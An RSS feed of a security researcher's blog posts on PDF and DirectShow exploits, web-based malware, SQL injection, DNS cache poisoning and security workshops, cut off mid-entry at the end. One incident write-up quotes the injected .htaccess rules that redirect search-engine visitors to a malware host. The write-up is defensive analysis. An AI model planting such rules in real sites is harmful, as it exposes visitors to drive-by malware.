<?xml version="1.0" encoding="utf-8" ?>

<rss version="2.0" 
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:admin="http://webns.net/mvcb/"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   >
<channel>
    <title>Niels Provos (Entries tagged as security)</title>
    <link>http://www.provos.org/</link>
    <description>systrace, spybye and other things.</description>
    <dc:language>en</dc:language>
    <generator>Serendipity 1.3.1 - http://www.s9y.org/</generator>
    
    

<item>
    <title>Adobe PDF Vulnerability: Stack overflow in Font File parsing</title>
    <link>http://www.provos.org/index.php?/archives/87-Adobe-PDF-Vulnerability-Stack-overflow-in-Font-File-parsing.html</link>
            <category>Malware</category>
            <category>News</category>
            <category>SpyBye</category>
    
    <comments>http://www.provos.org/index.php?/archives/87-Adobe-PDF-Vulnerability-Stack-overflow-in-Font-File-parsing.html#comments</comments>
    <wfw:comment>http://www.provos.org/wfwcomment.php?cid=87</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.provos.org/rss.php?version=2.0&amp;type=comments&amp;cid=87</wfw:commentRss>
    

    <author>nospam@example.com (Niels Provos)</author>
    <content:encoded>
    Metasploit has a great &lt;a href=&quot;http://blog.metasploit.com/2010/09/return-of-unpublished-adobe.html&quot;&gt;write up on new vulnerability in PDF&lt;/a&gt;.  The basic problem is a stack overflow when parsing OpenType fonts.  In particular, &lt;a href=&quot;http://www.adobe.com/devnet/opentype/gdk/topic.html&quot;&gt;SING Glyphlet tables&lt;/a&gt; contain a 27 byte long unique name that is expected to be NUL-terminated and stored in a 28-byte buffer.  The vulnerable code is using &lt;strong&gt;strcat&lt;/strong&gt; and lacks bounds checking resulting in a stack overflow.&lt;br /&gt;
&lt;br /&gt;
The PDF in the wild prepares the heap via Javascript and contains multiple different font files that are selected by navigating to a specific page in the PDF based on the viewer version.   Each font files has slightly different shell code.    It was amusing to see that the attackers after modifying the &lt;strong&gt;head&lt;/strong&gt; and &lt;strong&gt;SING&lt;/strong&gt; tables did not fix up their respective checksums.   According to Metasploit, this exploit works under Windows 7 with both DEP and ASLR turned on.   Fun Fun.   As of now, no patched version is available.  The &lt;a href=&quot;http://secbrowsing.blogspot.com/2010/09/protect-yourself-against-todays-pdf.html&quot;&gt;SecBrowsing blog&lt;/a&gt; contains instructions with temporary remedies. 
    </content:encoded>

    <pubDate>Thu, 09 Sep 2010 22:18:39 -0700</pubDate>
    <guid isPermaLink="false">http://www.provos.org/index.php?/archives/87-guid.html</guid>
    <category>exploit</category>
<category>malware</category>
<category>security</category>

</item>
<item>
    <title>LEET '10 Call for Papers</title>
    <link>http://www.provos.org/index.php?/archives/74-LEET-10-Call-for-Papers.html</link>
            <category>Malware</category>
            <category>News</category>
            <category>Security</category>
    
    <comments>http://www.provos.org/index.php?/archives/74-LEET-10-Call-for-Papers.html#comments</comments>
    <wfw:comment>http://www.provos.org/wfwcomment.php?cid=74</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.provos.org/rss.php?version=2.0&amp;type=comments&amp;cid=74</wfw:commentRss>
    

    <author>nospam@example.com (Niels Provos)</author>
    <content:encoded>
    The call for papers for the &lt;strong&gt;3rd USENIX Workshop on Large-Scale Exploits and Emergent Threats&lt;/strong&gt; (LEET &#039;10) Botnets, Spyware, Worms, and More just went out.   It will be held on &lt;strong&gt;April 27, 2010&lt;/strong&gt; in San Jose, CA.&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.usenix.org/event/leet10/cfp/&quot;&gt;LEET &#039;10&lt;/a&gt; will be co-located with the 7th USENIX Symposium on Networked Systems Design and Implementation (NSDI &#039;10), which will take place April 28–30, 2010.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Important Dates&lt;/strong&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Submissions due: Thursday, February 25, 2010, 11:59 p.m. PST&lt;/li&gt;&lt;li&gt;Notification of acceptance: Wednesday, March 24, 2010&lt;/li&gt;&lt;li&gt;Final papers due: Monday, April 5, 2010&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;
&lt;strong&gt;Workshop Organizers&lt;/strong&gt;&lt;br /&gt;
&lt;em&gt;Program Chair&lt;/em&gt;&lt;ul&gt;&lt;li&gt;Michael Bailey, University of Michigan&lt;/li&gt;&lt;/ul&gt;&lt;em&gt;Program Committee&lt;/em&gt;&lt;ul&gt;&lt;li&gt;Dan Boneh, Stanford University&lt;/li&gt;&lt;li&gt;Nick Feamster, Georgia Institute of Technology&lt;/li&gt;&lt;li&gt;Jaeyeon Jung, Intel Labs, Seattle&lt;/li&gt;&lt;li&gt;Christian Kreibich, International Computer Science Institute&lt;/li&gt;&lt;li&gt;Patrick McDaniel, Pennsylvania State University&lt;/li&gt;&lt;li&gt;Fabian Monrose, University of North Carolina, Chapel Hill&lt;/li&gt;&lt;li&gt;Jose Nazario, Arbor Networks, Inc.&lt;/li&gt;&lt;li&gt;Stefan Savage, University of California, San Diego&lt;/li&gt;&lt;li&gt;Matt Williamson, AVG Technologies&lt;/li&gt;&lt;li&gt;Yinglian Xie, Microsoft Research&lt;/li&gt;&lt;li&gt;Vinod Yegneswaran, SRI International&lt;/li&gt;&lt;br /&gt;
&lt;/ul&gt;Go submit your work! 
    </content:encoded>

    <pubDate>Sat, 29 Aug 2009 12:35:46 -0700</pubDate>
    <guid isPermaLink="false">http://www.provos.org/index.php?/archives/74-guid.html</guid>
    <category>cfp</category>
<category>malware</category>
<category>research</category>
<category>security</category>

</item>
<item>
    <title>DirectShow Vulnerability Exploited Everywhere</title>
    <link>http://www.provos.org/index.php?/archives/70-DirectShow-Vulnerability-Exploited-Everywhere.html</link>
            <category>Malware</category>
            <category>Security</category>
            <category>SpyBye</category>
    
    <comments>http://www.provos.org/index.php?/archives/70-DirectShow-Vulnerability-Exploited-Everywhere.html#comments</comments>
    <wfw:comment>http://www.provos.org/wfwcomment.php?cid=70</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.provos.org/rss.php?version=2.0&amp;type=comments&amp;cid=70</wfw:commentRss>
    

    <author>nospam@example.com (Niels Provos)</author>
    <content:encoded>
    The &lt;a href=&quot;http://secunia.com/advisories/35683/&quot;&gt;DirectShow&lt;/a&gt; &lt;a href=&quot;http://www.symantec.com/connect/blogs/directshow-exploit-wild&quot;&gt;vulnerabilities&lt;/a&gt; are being exploited all over the place now.  Unfortunately, the &lt;a href=&quot;http://www.computerworld.com/s/article/9135210/Hackers_exploit_second_DirectShow_zero_day_using_thousands_of_hijacked_sites&quot;&gt;second vulnerability&lt;/a&gt; in DirectShow is still unpatched and exploit sites seem to be jumping on this.  There is even some evidence that it&#039;s possible to &lt;a href=&quot;http://www.viruslist.com/en/weblog?weblogid=208187760&quot;&gt;successfully exploit&lt;/a&gt; the vulnerability without even using JavaScript.   New &lt;a href=&quot;http://isc.sans.org/diary.html?storyid=6739&quot;&gt;exploit domains&lt;/a&gt; are popping after &lt;a href=&quot;http://google.com/safebrowsing/diagnostic?site=ch.ma/&quot;&gt;every day&lt;/a&gt;.  DirectShow now seems to be what Flash and PDF were earlier in the year. 
    </content:encoded>

    <pubDate>Sat, 11 Jul 2009 09:38:16 -0700</pubDate>
    <guid isPermaLink="false">http://www.provos.org/index.php?/archives/70-guid.html</guid>
    <category>exploit</category>
<category>malware</category>
<category>security</category>

</item>
<item>
    <title>Cybercrime 2.0: When the Cloud Turns Dark</title>
    <link>http://www.provos.org/index.php?/archives/66-Cybercrime-2.0-When-the-Cloud-Turns-Dark.html</link>
            <category>Malware</category>
            <category>Security</category>
            <category>SpyBye</category>
    
    <comments>http://www.provos.org/index.php?/archives/66-Cybercrime-2.0-When-the-Cloud-Turns-Dark.html#comments</comments>
    <wfw:comment>http://www.provos.org/wfwcomment.php?cid=66</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.provos.org/rss.php?version=2.0&amp;type=comments&amp;cid=66</wfw:commentRss>
    

    <author>nospam@example.com (Niels Provos)</author>
    <content:encoded>
    We recently published an article on &lt;a href=&quot;http://queue.acm.org/detail.cfm?id=1517412&quot;&gt;web-based malware&lt;/a&gt; in ACM&#039;s Queue Magazine.  It provides a short overview of some of the challenges with detecting malicious web sites such as social engineering and examples of techniques for compromising web sites, e.g. htaccess redirection on Apache, etc.  This is the article on which my recent ISSNet talk was based. 
    </content:encoded>

    <pubDate>Wed, 01 Jul 2009 08:19:59 -0700</pubDate>
    <guid isPermaLink="false">http://www.provos.org/index.php?/archives/66-guid.html</guid>
    <category>exploit</category>
<category>malware</category>
<category>security</category>

</item>
<item>
    <title>LEET'09: Large Scale Exploits and Emergent Threats</title>
    <link>http://www.provos.org/index.php?/archives/62-LEET09-Large-Scale-Exploits-and-Emergent-Threats.html</link>
            <category>Malware</category>
            <category>News</category>
            <category>Security</category>
    
    <comments>http://www.provos.org/index.php?/archives/62-LEET09-Large-Scale-Exploits-and-Emergent-Threats.html#comments</comments>
    <wfw:comment>http://www.provos.org/wfwcomment.php?cid=62</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.provos.org/rss.php?version=2.0&amp;type=comments&amp;cid=62</wfw:commentRss>
    

    <author>nospam@example.com (Niels Provos)</author>
    <content:encoded>
    The 2nd USENIX LEET workshop is going to take place on April 21st in Boston next week.   The &lt;a href=&quot; http://www.usenix.org/events/leet09/tech/tech.html&quot;&gt;workshop program&lt;/a&gt; looks really interesting.  There are a number of really interesting talks; here are just a few:&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Spamcraft: An Inside Look At Spam Campaign Orchestration&lt;/li&gt;&lt;li&gt;A Foray into Conficker&#039;s Logic and Rendezvous Points&lt;/li&gt;&lt;li&gt;A View on Current Malware Behaviors&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;
&lt;br /&gt;
Last year&#039;s workshop was a blast and I expect that next week is going to be lots of fun, too.   It is still possible to &lt;a href=&quot;http://www.usenix.org/events/leet09/registration/&quot;&gt;register on-site&lt;/a&gt; for the workshop. 
    </content:encoded>

    <pubDate>Tue, 14 Apr 2009 17:25:08 -0700</pubDate>
    <guid isPermaLink="false">http://www.provos.org/index.php?/archives/62-guid.html</guid>
    <category>security</category>
<category>usenix</category>

</item>
<item>
    <title>Using htaccess To Distribute Malware</title>
    <link>http://www.provos.org/index.php?/archives/55-Using-htaccess-To-Distribute-Malware.html</link>
            <category>Malware</category>
            <category>SpyBye</category>
    
    <comments>http://www.provos.org/index.php?/archives/55-Using-htaccess-To-Distribute-Malware.html#comments</comments>
    <wfw:comment>http://www.provos.org/wfwcomment.php?cid=55</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.provos.org/rss.php?version=2.0&amp;type=comments&amp;cid=55</wfw:commentRss>
    

    <author>nospam@example.com (Niels Provos)</author>
    <content:encoded>
    Usually, I get to find compromised web servers, but last week I was asked to fix one.    A relative noticed that his web server would try to install a &lt;a href=&quot;http://malwarebytes.org/forums/index.php?showforum=30&quot;&gt;rogue anti-malware product&lt;/a&gt; and called me for help.   Curiously, the malware showed up only when clicking on the search results for his web site, but the site was fine when typing the address directly into the location bar.  A little investigation with curl could reproduce that behavior:&lt;br /&gt;
&lt;blockquote&gt;curl -I -H &quot;Referer: www.google.com&quot; http://www.foo.com/&lt;/blockquote&gt;&lt;br /&gt;
returned a 302 redirect to an IP address, whereas &lt;blockquote&gt;curl -I http://www.foo.com/&lt;/blockquote&gt;&lt;br /&gt;
returned a 200.   To find where the code might have been injected, I grepped the whole web server for the IP address and found the following gem in &lt;strong&gt;.htaccess&lt;/strong&gt;:&lt;br /&gt;
&lt;blockquote&gt;RewriteEngine On&lt;br /&gt;
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]&lt;br /&gt;
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]&lt;br /&gt;
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]&lt;br /&gt;
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]&lt;br /&gt;
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]&lt;br /&gt;
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]&lt;br /&gt;
RewriteRule .* http://89.28.13.204/in.html?s=xx [R,L]&lt;/blockquote&gt;&lt;br /&gt;
This code instructs the web server to redirect visitors to a malware site if they come from popular search engines.&lt;br /&gt;
&lt;br /&gt;
The attackers were able to insert this file as the web application had a remote file inclusion vulnerability.   These attacks are quite popular as we found in our paper: &lt;a href=&quot;http://www.usenix.org/events/sec08/tech/small.html&quot;&gt;To Catch a Predator: A Natural Language Approach for Eliciting Malicious Payloads&lt;/a&gt;.  The fix in this case was to remove the &lt;strong&gt;.htaccess&lt;/strong&gt; file and to upgrade the web application to a patched version without the vulnerability. 
    </content:encoded>

    <pubDate>Fri, 05 Dec 2008 20:34:36 -0800</pubDate>
    <guid isPermaLink="false">http://www.provos.org/index.php?/archives/55-guid.html</guid>
    <category>malware</category>
<category>security</category>
<category>usenix</category>

</item>
<item>
    <title>SQL Injection Redux</title>
    <link>http://www.provos.org/index.php?/archives/53-SQL-Injection-Redux.html</link>
            <category>Malware</category>
            <category>SpyBye</category>
    
    <comments>http://www.provos.org/index.php?/archives/53-SQL-Injection-Redux.html#comments</comments>
    <wfw:comment>http://www.provos.org/wfwcomment.php?cid=53</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.provos.org/rss.php?version=2.0&amp;type=comments&amp;cid=53</wfw:commentRss>
    

    <author>nospam@example.com (Niels Provos)</author>
    <content:encoded>
    &lt;a class=&#039;serendipity_image_link&#039; href=&#039;http://www.provos.org/uploads/sql-injection.png&#039;&gt;&lt;!-- s9ymdb:8 --&gt;&lt;img class=&quot;serendipity_image_left&quot; width=&quot;200px&quot; height=&quot;103px&quot; style=&quot;float: left; border: 0px; padding-left: 5px; padding-right: 5px;&quot; src=&quot;http://www.provos.org/uploads/sql-injection-small.png&quot; alt=&quot;&quot; /&gt;&lt;/a&gt;During my &lt;a href=&quot;http://www.usenix.org/events/sec08/tech/tech.html#provos&quot;&gt;invited talk&lt;/a&gt; on web-based malware at USENIX Security, I mentioned &lt;a href=&quot;http://en.wikipedia.org/wiki/SQL_injection&quot;&gt;SQL Injection&lt;/a&gt; as one of the more popular means of compromising web servers.   Although I did not have a chance to post my slides, here is one graph that shows how many URLs with drive-by downloads due to SQL injection were found by Google&#039;s infrastructure in July 2008; it&#039;s over 800,000 URLs.   Curiously, most of these were due to the &lt;a href=&quot;http://msmvps.com/blogs/harrywaldron/archive/2008/05/16/asprox-botnet-installs-sql-injection-tool.aspx&quot;&gt;Asprox botnet&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
The situation has slightly changed since then, Asprox has become quiet and most of the SQL Injection attacks seem to originate from Chinese sites.   One way to determine if a site has been injected with malicious content is the &lt;a href=&quot;http://googleonlinesecurity.blogspot.com/2008/05/safe-browsing-diagnostic-to-rescue.html&quot;&gt;Safe Browsing diagnostic page&lt;/a&gt; which shows infection domains and also how many sites they compromised.   Here is an example of a Chinese SQL injection domain, &lt;a href=&quot;http://www.google.com/safebrowsing/diagnostic?site=ko118.cn&quot;&gt;ko118.cn&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
To help web application developers, OWASP has published detailed guidelines on &lt;a href=&quot;http://www.owasp.org/index.php/Guide_to_SQL_Injection&quot;&gt;preventing SQL injection&lt;/a&gt; attacks.  More importantly if your web site was SQL injected, its database needs to be cleaned to &lt;a href=&quot;http://www.google.com/search?q=cleaning+sql+injection&quot;&gt;remove the injected content&lt;/a&gt;. 
    </content:encoded>

    <pubDate>Tue, 25 Nov 2008 20:59:35 -0800</pubDate>
    <guid isPermaLink="false">http://www.provos.org/index.php?/archives/53-guid.html</guid>
    <category>malware</category>
<category>security</category>
<category>sql injection</category>
<category>usenix</category>

</item>
<item>
    <title>LEET '09 Call for Papers</title>
    <link>http://www.provos.org/index.php?/archives/52-LEET-09-Call-for-Papers.html</link>
            <category>News</category>
            <category>Security</category>
            <category>Systrace</category>
    
    <comments>http://www.provos.org/index.php?/archives/52-LEET-09-Call-for-Papers.html#comments</comments>
    <wfw:comment>http://www.provos.org/wfwcomment.php?cid=52</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.provos.org/rss.php?version=2.0&amp;type=comments&amp;cid=52</wfw:commentRss>
    

    <author>nospam@example.com (Niels Provos)</author>
    <content:encoded>
    The &lt;a href=&quot;http://www.usenix.org/event/leet09/cfp/&quot;&gt;CfP&lt;/a&gt; for the 2nd USENIX Workshop on Large-Scale Exploits and Emergent Threats (LEET &#039;09): Botnets, Spyware, Worms, and More is up at:&lt;br /&gt;
&lt;br /&gt;
&lt;dl&gt;&lt;dd&gt;&lt;a href=&quot;http://www.usenix.org/event/leet09/cfp/&quot;&gt;http://www.usenix.org/event/leet09/cfp/&lt;/a&gt;.&lt;/dd&gt;&lt;/dl&gt;&lt;br /&gt;
LEET &#039;09 will be held on April 21, 2009 in Boston, MA immediately before the 6th USENIX Symposium on Networked Systems Design and Implementation (NSDI &#039;09), which will take place April 22–24, 2009. &lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Important Dates&lt;/strong&gt;&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Submissions due: January 16, 2009, 11:59 p.m. EST&lt;/li&gt;&lt;li&gt;Notification of acceptance: March 2, 2009&lt;/li&gt;&lt;li&gt;Electronic files due: March 30, 2009&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;
This will be the second edition of LEET, which had evolved from the combination of two other successful workshops, the ACM Workshop on Recurring Malcode (WORM) and the USENIX Workshop on Hot Topics in Understanding Botnets (HotBots). These two workshops have each dealt with aspects of this problem. However, while papers relating to both worms and botnets are explicitly solicited, LEET has a broader charter than its predecessors. We encourage submissions of papers that focus on any aspect of the underlying mechanisms used to compromise and control hosts, the large-scale &quot;applications&quot; being perpetrated upon this framework, or the social and economic networks driving these threats. 
    </content:encoded>

    <pubDate>Wed, 12 Nov 2008 18:48:12 -0800</pubDate>
    <guid isPermaLink="false">http://www.provos.org/index.php?/archives/52-guid.html</guid>
    <category>cfp</category>
<category>research</category>
<category>security</category>
<category>usenix</category>

</item>
<item>
    <title>Getting ready for USENIX Security</title>
    <link>http://www.provos.org/index.php?/archives/46-Getting-ready-for-USENIX-Security.html</link>
    
    <comments>http://www.provos.org/index.php?/archives/46-Getting-ready-for-USENIX-Security.html#comments</comments>
    <wfw:comment>http://www.provos.org/wfwcomment.php?cid=46</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.provos.org/rss.php?version=2.0&amp;type=comments&amp;cid=46</wfw:commentRss>
    

    <author>nospam@example.com (Niels Provos)</author>
    <content:encoded>
    This week is going to be crazy busy with &lt;a href=&quot;http://www.usenix.org/events/hotsec08/&quot;&gt;HotSec&lt;/a&gt; and &lt;a href=&quot;http://www.usenix.org/events/sec08/&quot;&gt;USENIX Security&lt;/a&gt; in San Jose.  I am chairing the HotSec workshop tomorrow.   We were able to get a pretty &lt;a href=&quot;http://www.usenix.org/events/hotsec08/tech/&quot;&gt;nice program&lt;/a&gt; this year.   At USENIX Security, I am going to give two talks.  One is in the technical program talking about &quot;&lt;a href=&quot;http://www.usenix.org/events/sec08/tech/provos.html&quot;&gt;All Your iFrames Point to Us&lt;/a&gt;&quot; and the other one is an invited talk on &lt;a href=&quot;http://www.usenix.org/events/sec08/tech/techspeakers.html#provos&quot;&gt;web-based malware&lt;/a&gt; on Friday.   I am still working on the slides. 
    </content:encoded>

    <pubDate>Mon, 28 Jul 2008 17:51:44 -0700</pubDate>
    <guid isPermaLink="false">http://www.provos.org/index.php?/archives/46-guid.html</guid>
    <category>security</category>
<category>speaking</category>
<category>usenix</category>

</item>
<item>
    <title>DNS And Responsible Disclosure</title>
    <link>http://www.provos.org/index.php?/archives/44-DNS-And-Responsible-Disclosure.html</link>
            <category>Hacking</category>
            <category>Security</category>
    
    <comments>http://www.provos.org/index.php?/archives/44-DNS-And-Responsible-Disclosure.html#comments</comments>
    <wfw:comment>http://www.provos.org/wfwcomment.php?cid=44</wfw:comment>

    <slash:comments>3</slash:comments>
    <wfw:commentRss>http://www.provos.org/rss.php?version=2.0&amp;type=comments&amp;cid=44</wfw:commentRss>
    

    <author>nospam@example.com (Niels Provos)</author>
    <content:encoded>
    As everyone was upgrading their DNS infrastructure to be ready for August 7th, some security reseachers independently discovered the DNS flaw and disclosed it.  For those of us, who were either informed or had figured out the problem ourselves, it is surprising to find irresponsible and grossly negligent disclosure from respected members of our community.   There was a reason that Kaminsky did not disclose the flaw publicly when he found it.   The DNS infrastructure needed to be upgraded and repaired.&lt;br /&gt;
&lt;br /&gt;
Well, the time has run out.  A current study by David Dagon and myself puts the number of open recursive resolvers using static source ports at about &lt;strong&gt;78%&lt;/strong&gt;.   That is a lot of servers that need to be patched.  Two more weeks till August 7th could have helped to fix many of them.  Unfortunately, we will not find out now. 
    </content:encoded>

    <pubDate>Tue, 22 Jul 2008 09:15:00 -0700</pubDate>
    <guid isPermaLink="false">http://www.provos.org/index.php?/archives/44-guid.html</guid>
    <category>dns</category>
<category>security</category>

</item>
<item>
    <title>DNS Testing Image</title>
    <link>http://www.provos.org/index.php?/archives/43-DNS-Testing-Image.html</link>
            <category>Hacking</category>
            <category>Security</category>
    
    <comments>http://www.provos.org/index.php?/archives/43-DNS-Testing-Image.html#comments</comments>
    <wfw:comment>http://www.provos.org/wfwcomment.php?cid=43</wfw:comment>

    <slash:comments>2</slash:comments>
    <wfw:commentRss>http://www.provos.org/rss.php?version=2.0&amp;type=comments&amp;cid=43</wfw:commentRss>
    

    <author>nospam@example.com (Niels Provos)</author>
    <content:encoded>
    As we are all trying to patch and upgrade our resolvers and NAT devices, I created a small image tag that automatically assesses the randomess of a visitor&#039;s resolver:&lt;br /&gt;
&lt;br /&gt;
&lt;center&gt;&lt;a href=&quot;http://www.provos.org/index.php?/archives/42-DNS-and-Randomness.html&quot;&gt;&lt;img src=&quot;http://porttest.honeyd.org/-s-_dns.png&quot; border=0&gt;&lt;/a&gt;&lt;/center&gt;This is still in reference to the CERT Advisory on &lt;a href=&quot;http://www.kb.cert.org/vuls/id/800113&quot;&gt;Multiple DNS implementations vulnerable to cache poisoning&lt;/a&gt;.  You can place the image tag on your web page to test your visitors:&lt;br /&gt;
&lt;blockquote&gt;&amp;lt;center&amp;gt;&amp;lt;a href=&quot;http://www.provos.org/index.php?/archives/42-DNS-and-Randomness.html&quot;&amp;gt;&amp;lt;img src=&quot;http://porttest.honeyd.org/-s-_dns.png&quot; border=0&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/center&amp;gt; &lt;/blockquote&gt;&lt;br /&gt;
&lt;br /&gt;
The &lt;em&gt;a href&lt;/em&gt; link can of course point to a more helpful web page and the image itself can also be changed according to need.&lt;br /&gt;
&lt;br /&gt;
If you want to show this on your pages with different images, just let me know.&lt;br /&gt;
&lt;br /&gt;
 
    </content:encoded>

    <pubDate>Tue, 15 Jul 2008 19:11:50 -0700</pubDate>
    <guid isPermaLink="false">http://www.provos.org/index.php?/archives/43-guid.html</guid>
    <category>dns</category>
<category>security</category>

</item>
<item>
    <title>DNS and Randomness</title>
    <link>http://www.provos.org/index.php?/archives/42-DNS-and-Randomness.html</link>
            <category>Hacking</category>
    
    <comments>http://www.provos.org/index.php?/archives/42-DNS-and-Randomness.html#comments</comments>
    <wfw:comment>http://www.provos.org/wfwcomment.php?cid=42</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.provos.org/rss.php?version=2.0&amp;type=comments&amp;cid=42</wfw:commentRss>
    

    <author>nospam@example.com (Niels Provos)</author>
    <content:encoded>
    Over the last few days, we have heard a lot about DNS cache poisoning and how we need to get our recursive resolvers to use random source ports.   We are being told that this is a flaw in the protocol, but no details are going to be available until a presentation at Blackhat in August.   DNS cache poisoning of course has been around for a long time, most notably when the 16-bit query IDs were not randomized.  Here are some good references:&lt;ul&gt;&lt;br /&gt;
&lt;li&gt;&lt;a href=&quot;http://www.lurhq.com/dnscache.pdf&quot;&gt;DNS Cache Poisoning – The Next Generation&lt;/a&gt; - Joe Stewart elaborating on observations from &lt;a href=&quot;http://www.rnp.br/cais/alertas/2002/cais-ALR-19112002a.html&quot;&gt;Vagner Sacramento&lt;/a&gt; in 2002: Bind would issue multiple request with the same query to the same IP; increasing the chance of spoofed DNS packets to guess the right query ID.&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.trusteer.com/bind9dns&quot;&gt;Bind 9 DNS Cache Poisoning&lt;/a&gt; by Amit Klein in 2007 requires just 10 guesses to predict the query ID.&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://lcamtuf.coredump.cx/oldtcp/tcpseq.html&quot;&gt;Strange Attractors and TCP/IP Sequence Number Analysis&lt;/a&gt; Michal Zalewski in 2001 looked at predicting the 32-bit TCP sequence number across multiple operating systems; a very similar problem to predicting 16-bit source port and 16-bit query ID.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;
Oarc in the meantime has made a &lt;a href=&quot;https://www.dns-oarc.net/oarc/services/porttest&quot;&gt;port testing server &lt;/a&gt;available.   A simple invocation of dig tells you if your recursive resolver is vulnerable:&lt;br /&gt;
&lt;blockquote&gt;dig +short porttest.dns-oarc.net TXT&lt;/blockquote&gt;&lt;br /&gt;
The TXT record assesses a resolver&#039;s source port randomness as poor, fair or good.  Unfortunately, on my network, I found this record constantly cached from other resolvers, so I wrote a small Python tool that analyzes the &lt;a href=&quot;http://en.wikipedia.org/wiki/Statistical_randomness&quot;&gt;randomness&lt;/a&gt; of both your source port numbers as a well as your query IDs.   The tool can be downloaded from:&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;a href=&quot;http://www.monkey.org/~provos/dnspredict.py&quot;&gt;http://www.monkey.org/~provos/dnspredict.py&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;Its usage is pretty simple:&lt;br /&gt;
 &lt;br /&gt;&lt;a href=&quot;http://www.provos.org/index.php?/archives/42-DNS-and-Randomness.html#extended&quot;&gt;Continue reading &quot;DNS and Randomness&quot;&lt;/a&gt;
    </content:encoded>

    <pubDate>Sun, 13 Jul 2008 17:59:11 -0700</pubDate>
    <guid isPermaLink="false">http://www.provos.org/index.php?/archives/42-guid.html</guid>
    <category>dns</category>
<category>security</category>

</item>
<item>
    <title>HotSec is Hot!</title>
    <link>http://www.provos.org/index.php?/archives/41-HotSec-is-Hot!.html</link>
            <category>News</category>
    
    <comments>http://www.provos.org/index.php?/archives/41-HotSec-is-Hot!.html#comments</comments>
    <wfw:comment>http://www.provos.org/wfwcomment.php?cid=41</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://www.provos.org/rss.php?version=2.0&amp;type=comments&amp;cid=41</wfw:commentRss>
    

    <author>nospam@example.com (Niels Provos)</author>
    <content:encoded>
    &lt;!-- s9ymdb:4 --&gt;&lt;img class=&quot;serendipity_image_left&quot; width=&quot;533&quot; height=&quot;120&quot; style=&quot;float: left; border: 0px; padding-left: 2px; padding-right: 5px;&quot; src=&quot;http://www.provos.org/uploads/hotsec08banner1.jpg&quot; alt=&quot;&quot; /&gt;&lt;br /&gt;
This year, I have the pleasure of chairing the &lt;a href=&quot;http://www.usenix.org/events/hotsec08/&quot;&gt;3rd USENIX Workshop on Hot Topics in Security&lt;/a&gt;, an invitation-only workshop that provides a forum for leading security researchers to discuss current trends and new research ideas.  At the program committee meeting in Mountain View, we selected 13 out of 37 papers for the final &lt;a href=&quot;http://www.usenix.org/events/hotsec08/tech/&quot;&gt;program&lt;/a&gt;.  It&#039;s pretty &lt;strong&gt;hot&lt;/strong&gt;.  Here are some of the talks I am looking forward to:&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Towards Application Security on Untrusted Operating Systems&lt;/li&gt;&lt;li&gt;Defeating Deniable File Systems: A TrueCrypt Case Study&lt;/li&gt;&lt;li&gt;Panic Passwords: Authenticating under Duress&lt;/li&gt;&lt;li&gt;Absence Makes the Heart Grow Fonder: New Directions for Implantable Medical Device Security&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;
HotSec is taking place on July 29th, one day before the technical program of the &lt;a href=&quot;http://www.usenix.org/events/sec08/tech/&quot;&gt;USENIX Security Symposium&lt;/a&gt;.  The keynote for USENIX Security is going to be exciting:  &lt;a href=&quot;http://www.usenix.org/events/sec08/tech/techspeakers.html#bowen&quot;&gt;Debra Bowen&lt;/a&gt;, the California Secretary of State, is speaking on &lt;em&gt;Dr. Strangevote or: How I Learned to Stop Worrying and Love the Paper Ballot&lt;/em&gt;.&lt;br /&gt;
&lt;br /&gt;
See you there,&lt;br /&gt;
 Niels.&lt;br /&gt;
 
    </content:encoded>

    <pubDate>Thu, 10 Jul 2008 17:05:43 -0700</pubDate>
    <guid isPermaLink="false">http://www.provos.org/index.php?/archives/41-guid.html</guid>
    <category>hotsec</category>
<category>security</category>
<category>usenix</category>

</item>
<item>
    <title>The Ghost In The Browser</title>
    <link>http://www.provos.org/index.php?/archives/17-The-Ghost-In-The-Browser.html</link>
            <category>Malware</category>
            <category>SpyBye</category>
    
    <comments>http://www.provos.org/index.php?/archives/17-The-Ghost-In-The-Browser.html#comments</comments>
